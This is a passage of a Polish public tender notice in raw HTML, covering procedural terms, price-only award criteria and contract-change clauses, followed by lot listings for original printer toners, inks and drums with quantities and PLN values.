<span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiany wymienione w ust. 2, 3, 4, 5 mogą być dokonane na wniosek Wykonawcy w terminie 14 dni od dnia przesłania zawiadomienia w formie aneksu do umowy.2.	W przypadku szczególnych okoliczności, takich jak wstrzymanie lub zakończenie produkcji, strony dopuszczają możliwość dostarczania odpowiedników towarów objętych umową w cenach nie przewyższających cen zawartych w ofercie przetargowej, o właściwościach wyszczególnionych w załączniku nr 1 do umowy.3.	Zamawiający dopuszcza możliwość zaoferowania odpowiedników towarów objętych umową w cenach nie przekraczających cen zawartych w ofercie przetargowej o właściwościach wyszczególnionych w załączniku nr 1 do umowy.4.	Zamawiający dopuszcza możliwość zmiany wielkości opakowania towaru objętego umową przetargową z możliwością przeliczenia ceny nie przekraczającej ceny zaoferowanej w ofercie przetargowej.5.	W przypadku niezrealizowania umowy w terminie - w zakresie ilości i wartości przedmiotu zamówienia, z przyczyn dotyczących Zamawiającego - wynikających z niewykorzystania w działalności leczniczej ilości wyrobów dostarczanych, Zamawiający przewiduje możliwość przedłużenia terminu realizacji umowy, nie dłużej niż o trzy miesiące, co zostanie potwierdzone aneksem do umowy.6.	Wszelkie zmiany niniejszej umowy będą dokonywane przez strony w formie pisemnego aneksu pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-11-20</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data">2018-12-19</span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres"></span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Pakiet 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ORYGINAŁY1	Toner HP - LJ 1100/3310/3200 szt. 52	Toner HP P1102 85A szt. 53	Toner HP LaserJet 5000;5100;5000LE C4129X	szt. 14	Toner do drukarki HP Color 3600 Q6470A CZARNY	szt. 15	Toner do drukarki HP Color 3600 Q6471A NIEBIESKI	szt. 16	Toner do drukarki HP Color 3600 Q6472A ŻÓŁTY	szt. 17	Toner do drukarki HP Color 3600 Q6473A CZERWONY	szt. 18	Toner HP - LJ 1010/1012/1015/1020/3055 12A	szt. 59	Toner HP - LJ 1200/3300/3330 15A	szt. 910	Toner HP - LJ 2055 05X	szt. 611	Toner HP - LJ P1006 35A	szt. 412	Toner HP - LJ P2015/M2727/P2010 53A	szt. 213	Toner HP - LJ 1320/1160 szt. 114	toner hp - LJ 1600/2600 BK	szt.	215	toner hp - LJ 1600/2600 C	szt.	116	toner hp - LJ 1600/2600 Y	szt.	117	toner hp - LJ 1600/2600 M	szt.	118	Toner HP P1505/M1120/1522,2K LHP CB436A	szt. 119	Toner HP LJ CP2025 530 BLACK	szt. 120	Toner HP LJ CP2025 531 cyan	szt. 121	Toner HP LJ CP2025 532 yellow	szt. 122	Toner HP LJ CP2025 533 magenta	szt. 123	Toner Hp 1150 Q2624A	szt. 124	Toner HP LJ 2035 CE505A	szt. 125	Toner HP LaserJet CP1215, 1515N, 1518N CB541 niebieski	szt. 226	Toner HP LaserJet CP1215, 1515N, 1518N CB542 żółty	szt. 227	Toner HP LaserJet CP1215, 1515N, 1518N CB543 czerwony	szt. 228	Toner HP LaserJet CP1215, 1515N, 1518N CB540A czarny	szt. 229	Toner do HP LJ CP1025 black HP126A	szt. 230	Toner do HP LJ CP1025 yellow HP126A	szt. 131	Toner do HP LJ CP1025 cyan HP126A	szt. 132	Toner do HP LJ CP1025 magenta HP126A	szt. 133	Toner hp LJ 26A czarny ProM402 dw	szt. 134	Toner 25tys.kopii Hp laser M605 Cf281x Orginał	szt. 135	Toner HP laserjet PRO200 CF210A czarny	szt. 136	Toner HP laserjet PRO200 CF212A ŻÓŁTY	szt. 137	Toner HP laserjet PRO200 CF213A CZERWONY	szt. 138	Toner HP laserjet PRO200 CF211A niebieski	szt. 139	Toner HP laser Jet Pro 400 M401DNE CF280X kopii6800	szt. 740	Toner Brother HL-1112E TN-1030	szt. 241	toner brother TN-3280 na 8 tys.kopii do drukarki HL 5340D	szt.	142	toner Brother TN-2320 MFC-L2700DW DC-PL 2520DW Druk 2600stron czarny	szt. 2043 TONER do Brother MFC-L8650COW TN-326 K CZARNY	szt. 244	TONER do Brother MFC-L8650COW TN-326 Y	szt. 145	TONER do Brother MFC-L8650COW TN-326 M	szt. 146 TONER do Brother MFC-L8650COW TN-326 C	szt. 147	Toner Brother MFC 8510DN TN3380 8000TYS..kopii	szt. 248	toner Brother DCP-L5500dn TN3430	szt. 249	Toner brother mfc L2712Dn L2372DN L2312D (TN2411)	szt. 250	toner do Brother HL-3170cdw TN-241 BK	szt. 251	toner do Brother HL-3170cdw TN-245 C	szt. 252	toner do Brother HL-3170cdw TN-245 M	szt. 253	toner do Brother HL-3170cdw TN-245 Y	szt. 254	toner BROTHER HL-L2310D TN-2420	szt. 155	Toner do drukarki Brother HL- 5250DN ref: TN 3170	szt. 456	Toner oki 4100 TYP 9 do drukarki B4100	szt.	257	Toner OKI B6200/B6250/B6300	szt. 258	toner do OKI- C531 DN czarny	szt. 259	toner do OKI- C531 DN Magenta	szt. 160	toner do OKI- C531 DN Yellow	szt. 161	toner do OKI- C531 DN Cyan	szt. 162	toner do oki c532 1500stron czarny	szt. 263	toner do oki c532 1500stron cyan	szt. 164	toner do oki c532 1500stron magenta	szt. 165	toner do oki c532 1500stron yellow	szt. 166	toner oki B431DN 12tys. Kopii	szt. 567	toner do OKI-MC342w 1500tys.wydr. 1kpl.=3szt KOLOR	kpl.	568 toner do OKI-MC342w 1500tys.wydr. CZARNY	szt. 1269 toner SAMSUNG ML-TD305L ML-3750	szt. 270	Toner Samsung ML-1640/SEE /ML-2240 D1082	szt. 271	Toner samsung black CLP325 K4072	szt. 272	Toner samsung cyan CLP325 C4072	szt. 273	Toner samsung magenta CLP325 M4072	szt. 274	Toner samsung yellow CLP325 Y4072	szt. 275	toner samsung czarny CLP 365, 360 K406 szt. 776	Toner samsung cyan CLP 365, 360 C406	szt. 477	Toner samsung magenta CLP 365, 360 M406	szt. 478	Toner samsung yellow CLP 365, 360 Y406	szt. 479	Toner Samsung xpress C430w K404	szt. 1580	Toner Samsung xpress C430w C404	szt. 2881	Toner Samsung xpress C430w M404	szt. 2182	Toner Samsung xpress C430w Y404	szt. 2483	toner Samsung Ml2250/2252	szt. 184	Toner OLIVETTI d-Copia 4023MF B1234	szt. 285	Toner d-Copia16,16MF,200,200MF,1600 B0446	szt. 686	Toner OLIVETTI d-Copia 163MF	szt. 287 toner OLIVETTI d-Copia 3513/3503 MF b1011	szt. 188	Toner OLIVETTI d-Copia BO958 ( KOPIARKA 928MF)	szt. 789 Toner do olivetti 1800 B0839	szt. 390	TONER OLIVETTI d-Copia 200D (220D) NR.BO477	szt. 491	Toner OLIVETTI d-Copia 283 ( BO740 )	szt. 192	Toner Konica Minolta Magicolor 1690MF CZARNY	szt. 293	Toner Konica Minolta Magicolor 1690MF Cyan	szt. 194	Toner Konica Minolta Magicolor 1690MF Yellow	szt. 195	Toner Konica Minolta Magicolor 1690MF Magenta szt. 196	Zestaw - 3 Tonery kolory do drukarki Koni.Minol.Magicolor 1600 , 1690MF	kpl.	197	Toner Toshiba T 1800E (do kserokopiarki Toshiba e-STUDIO 18)	szt. 298	Toner do TOSHIBA T-4590E E-STUDIO 456SE	szt. 499	Toner do faxu Panasonic FXFL613 ( 83 )	szt. 1100	Toner do faxu Panasonic FXMB 773 ( 92 )	szt. 1101	Toner FS 1320D/1370 KIT TK170 KYOCERA	szt. 2102	toner do Kyocera M3040idn TK3150	szt. 1103	Toner KYOCERA ECOSYS M2035dn TK1140	szt. 1104	Toner KYOCERA ECOSYS 6530CDE TK5140K	szt. 2105	Toner do kserokopiarki KYOCERA FS-6025/6030 MFP TK475	szt. 2106	Toner CANON CRG728 MF4410	szt. 1107	Toner do kserokopiarki CANON iR 1018 1020 CXV18	szt. 1108	Toner do xero Canon FX10 szt. 1109	toner PHASER 3260 3000kopii	szt. 3110	toner do lexmark MS312 dn	szt. 2111	Toner do kserokopiarki Sharp AR-168T (5012)	szt. 4112	toner do XEROX WorkCentre 3345 (15 tyś. kopii)	szt. 2<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30125100-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 107280,64<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Pakiet 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ORYGINAŁY1	Tusz hp nr 339 czarny	szt.	62	Tusz hp nr 344 kolor	szt.	63	tusz hp 343 kolor	szt.	54	tusz hp 338 czarny	szt.	55	Tusz HP C9351A ( 21 ) F2280	szt. 36	tusz HP6230 935 żółty	szt. 57	tusz HP6230 935 czerwony	szt. 58	tusz HP6230 935 niebieski	szt. 59	tusz HP6230 935 czarny	szt. 810	tusz HP PRO 251DW 950 czarny	szt. 511	tusz HP PRO 251DW 951 yellow szt. 312	tusz HP PRO 251DW 951 magenta	szt. 313	tusz HP PRO 251DW 951 cyan	szt. 314	Tusz HP DESKJET 5650 nr. 56	szt. 215	Tusz HP DESKJET 5650 nr. 57	szt. 1016	TUSZ HP 934 XL czarny Officejet Pro 6230/6830	szt. 317	TUSZ HP 935 XL żółty Officejet Pro 6230/6830	szt. 218	TUSZ HP 935 XL czerwony Officejet Pro 6230/6830	szt. 219	TUSZ HP 935 XL niebieski Officejet Pro 6230/6830	szt. 220	tusz364 czarny CN684EE HP 3520 13ml	szt. 1521	tusz364 CYAN CB323EE HP 3520 13ml	szt. 422	Tusz364 MAGENTA CB324EE HP 3520 13ml	szt. 423	Tusz364 yellow CB325EE HP 3520	szt. 424	Tusz do drukarki 3050 CH563EE HP 301XL CZARNY szt. 1025	Tusz do drukarki 3050 CH564EE HP 301XL kolor	szt. 926	TUSZ czarny HP652 kolor	szt. 227	TUSZ czarny HP652 czarny	szt. 228	Tusz Brother DCP J315W J140W żółty	szt. 5029	Tusz Brother DCP J315W J140W niebieski	szt. 5030	Tusz Brother DCP J315W J140W czerwony	szt. 5031	Tusz Brother DCP J315W J140W czarny	szt. 11032	Tusz ZESTAW 4 szt Brother DCP J315W J140W	kpl	1033	tusz Brother DCP J105 LX529 XL-BL czarny	szt. 4034	tusz Brother DCP J105 LX525 XL-C cyan szt. 6035	tusz Brother DCP J105 LX525 XL-Y yellow szt. 6036	tusz Brother DCP J105 LX525 XL-M magenta	szt. 6037	tusz brother Ic3619 bk MFC J3930	szt. 438	tusz brother Ic3619 c MFC J3930	szt. 239	tusz brother Ic3619 y MFC J3930	szt. 240	tusz brother Ic3619 m MFC J3930	szt. 241	tusz czarny Brother DCP T 500W BT600BK 140ml	szt. 242	tusz magenta Brother DCP T 500W BT500M	szt. 243	tusz yellow Brother DCP T 500W BT500Y	szt. 244	tusz cyan Brother DCP T 500W BT500C	szt. 345	Tusz SAMSUNG CLP 315 czarny xeromat	szt. 546	Tusz SAMSUNG CLP 315 magenta	szt. 247	Tusz SAMSUNG CLP 315 yellow	szt. 248	Tusz SAMSUNG CLP 315 cyan	szt. 249	tusz do lexmarka PRO905 200-209SE cyan 100XL	szt. 350	tusz do lexmarka PRO905 200-209SE CZARNY 100 XL szt. 351	tusz do lexmarka PRO905 200-209SE Magenta 100XL	szt. 352	tusz do lexmarka PRO905 200-209SE yellow 100XL	szt. 353	tusz cannon CL41 black iP 1600/2200/6210D	szt. 554	tusz cannon CL40 color iP 1600/2200/6210D	szt. 5<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30125100-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 34957,48<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Pakiet 3</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ORYGINAŁY1	Bęben do faxu Panasonic KXMB 773 ( 93 )	szt.	12	Bęben konika minolte 1690MF	szt.	63 BĘBEN MFC DR-2300 BRATHER MFC-L2720DW	szt. 14	Bęben do drukarki Brother HL/MFC-L8650CDW	szt. 15	Bęben do drukarki Brother HL-5250DN	szt. 16	Bęben Brother DC-PL 2520DW, MFC-L2700DW	szt. 27	Bęben do drukarki Brother MFC-L8450CDW	szt. 18	Bęben do drukarki Brother DCP-L5500DN	szt. 29	Bęben do drukarki Brother DR-2200 ( MFC-7360N)	szt. 110	Bęben do drukarki Samsung CLP365	szt. 111	bęben do drukarki olvetti 3503 mf DK 170 (3513mf)	szt. 112	Bęben do drukarki XPRESS C430w	szt. 113	Bęben do kserokopiarki OLIVETTI D-Copia 1600	szt. 114	Taśma OKI 09002303	szt. 2015	Kaseta z taśmą Laminated 24mm black TZe-S251 brother	szt. 5<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30125100-2, <br/><br/><b> 3) Wartość 